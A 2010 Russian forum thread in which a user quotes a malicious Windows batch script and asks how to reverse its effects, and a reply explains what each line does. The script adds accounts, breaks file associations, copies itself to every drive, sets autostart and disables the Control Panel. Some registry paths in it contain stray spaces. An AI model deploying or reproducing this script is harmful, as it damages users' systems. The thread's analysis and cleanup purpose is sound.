Как откатить действия вот такого *.bat файла? - Безопасность, Шифрование

Altera · 08.09.2010, 17:26

Всем привет!
На днях в аську постучался один тип, спросил то-же что и щас спрашиваю у вас: Как откатить последствия выполнения вот такого скриптика

Цитата:

@echo off
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
time 0:00 >nul
date 13.06.23 >nul
label C:Лок Дмск >nul
label D:URAK >nul
label E:SUKA >nul
label F:GANDON >nul
copy %0 C:\Open.bat >nul
copy %0 D:\Open.bat >nul
copy %0 E:\Open.bat >nul
copy %0 F:\Open.bat >nul
net user "Idiot you Hacked" /add >nul
net user "Bitch you Hacked" /add >nul
net user "Durak you Hacked" /add >nul
net user "Kritin you Hacked" /add >nul
net user "Gavno you Hacked" /add >nul
md 1 >nul
md 2 >nul
md 3 >nul
md 4 >nul
md 5 >nul
md 6 >nul
md 7 >nul
md 8 >nul
md 9 >nul
md 10 >nul
md 11 >nul
md 12 >nul
md 13 >nul
md 14 >nul
md 15 >nul
md 16 >nul
md 17 >nul
md 18 >nul
md 19 >nul
md 20 >nul
md 21 >nul
md 22 >nul
md 23 >nul
md 24 >nul
md 25 >nul
md 26 >nul
md 27 >nul
assoc .lnk=.txt >nul
assoc .exe=.txt >nul
:x ;
Start mspaint
goto x ;
:x ;
Start Calc
goto x ;
copy ""%0"" "%SystemRoot%\system32\Cool.bat " >nul
reg add "HKLM\SOFTWARE\Microsoft\Windows\Cu rrentVersion\Run" /v "Cool" /t REG_SZ /d "%SystemRoot%\system32\Cool.bat " /f >nul
reg add HKCU\Software\Microsoft\Windows\Cur rentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul
del %0 >nul

Прикол в том, что этот "вирус" его рук дело, и был каким-то образом запущен на его компе и теперь он не может избавится от последствие его работы. Я то запустил его на виртуалке, ну в общем так то ему и надо, но мне самому интересно что тут собственно происходит.

Alex Cones · 08.09.2010, 17:36

Цитата:

%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul

Мышка для левшей

Цитата:

net user "Idiot you Hacked" /add >nul
net user "Bitch you Hacked" /add >nul
net user "Durak you Hacked" /add >nul
net user "Kritin you Hacked" /add >nul
net user "Gavno you Hacked" /add >nul

Кажись добавление юзверей.

Цитата:

label C:Лок Дмск >nul
label D:URAK >nul
label E:SUKA >nul
label F:GANDON >nul

Смена меток диска,

Цитата:

md 1 >nul

Создание папок на жестком

Цитата:

:x ;
Start mspaint
goto x ;

Бесконечный запуск пеинта и калькулятора

Цитата:

assoc .lnk=.txt >nul
assoc .exe=.txt >nul

Нельзя открыть lnk и exe

Цитата:

del %0 >nul

Уничтожение батника.

Цитата:

copy ""%0"" "%SystemRoot%\system32\Cool.bat " >nul
reg add "HKLM\SOFTWARE\Microsoft\Window s\Cu rrentVersion\Run" /v "Cool" /t REG_SZ /d "%SystemRoot%\system32\Cool.bat " /f >nul

Чистим следы

Цитата:

copy %0 C:\Open.bat >nul
copy %0 D:\Open.bat >nul
copy %0 E:\Open.bat >nul
copy %0 F:\Open.bat >nul

Пишем себя на все устройства

Altera · 08.09.2010, 17:57

Вот зараза.

Цитата:

assoc .lnk=.txt >nul
assoc .exe=.txt >nul

Это все *.exe и *.lnk будут открываться в блокноте?

Alex Cones · 08.09.2010, 18:11

Будут открываться тем, что открывает txt. Где-то здесь на форуме валялась лечилка такого дела.

08.09.2010, 18:11	#4
Alex Cones Trust no one. Старожил Регистрация: 07.04.2009 Сообщений: 6,526	Будут открываться тем, что открывает txt. Где-то здесь на форуме валялась лечилка такого дела. SQUARY PROJECT - НАБОР БЕСПЛАТНЫХ ПРОГРАММ ДЛЯ РАБОЧЕГО СТОЛА. МОЙ БЛОГ GRAY FUR FRAMEWORK - УДОБНАЯ И БЫСТРАЯ РАЗРАБОТКА WINAPI ПРИЛОЖЕНИЙ

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Проверка на наличие файла и последующие действия.	D_A_akella	Общие вопросы Delphi	3	20.04.2010 16:44
Создание файла если такого файла нету	Shaitan63	Помощь студентам	14	10.04.2010 20:39
Шифрование ссылок и если решение на php вот такого скрипта	kaviga	PHP	10	10.01.2010 23:39
Отсортировать матрицу вот такого вида!	defol-2009	Общие вопросы C/C++	2	22.07.2009 13:23